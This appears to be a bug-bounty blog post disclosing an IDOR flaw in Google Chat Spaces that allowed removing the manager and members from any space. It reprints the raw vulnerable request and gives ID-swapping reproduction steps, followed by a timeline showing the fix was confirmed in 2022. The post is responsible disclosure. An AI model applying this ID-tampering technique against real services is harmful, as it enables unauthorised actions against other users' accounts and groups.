IDOR leads to removing members from any Google Chat Space.

 In Google Chat Spaces, the creator automatically becomes the Space Manager.

Due to the IDOR vulnerability, an attacker could be able to remove the Space Manager and members from any Space.

Vulnerable request : 

POST /u/0/_/DynamiteWebUi/data/batchexecute?rpcids=itoCId&source-path=%2Fu%2F0%2Fmole%2Fworld&f.sid=2214863011575308312&bl=boq_dynamiteuiserver_20220624.01_p0&hl=en&soc-app=1&soc-platform=1&soc-device=1&_reqid=14582833&rt=c HTTP/2

Host: chat.google.com


[[["itoCId","[[],["space/AAAAuypwSbs","AAAAuypwSbs",2],4,[["user/105599426893724266332",null,"105599426893724266332",null,["105599426893724266332","human/105599426893724266332",0],"user/human/105599426893724266332"]],null,null,[]]",null,"generic"]]]&at=ALDO5-NfcbsvAFhduORqxN84kZGt:1656869432201&

By changing the Space ID and user ID , an attacker could remove members from any space. 

Steps to reproduce :

1) Go to https://mail.google.com/chat/u/0/#chat/space/

2) Open " View Members" , click "Remove from space" and intercept the request

3) Replace the user ID and Space ID  with the victim's ID and Space ID ,  and send the request.

4) The victim will be removed from the space.


Reported :  04-07 -2022

Triaged :  04-07 -2022

Accepted : 04-07 -2022

Rewarded : 19-07-2022 

Fix confirmed : 14-08-2022



















































Comments

Popular posts from this blog

Group expert's pending expertise request leaking on Facebook

Details about future collaboration profiles and pages have been revealed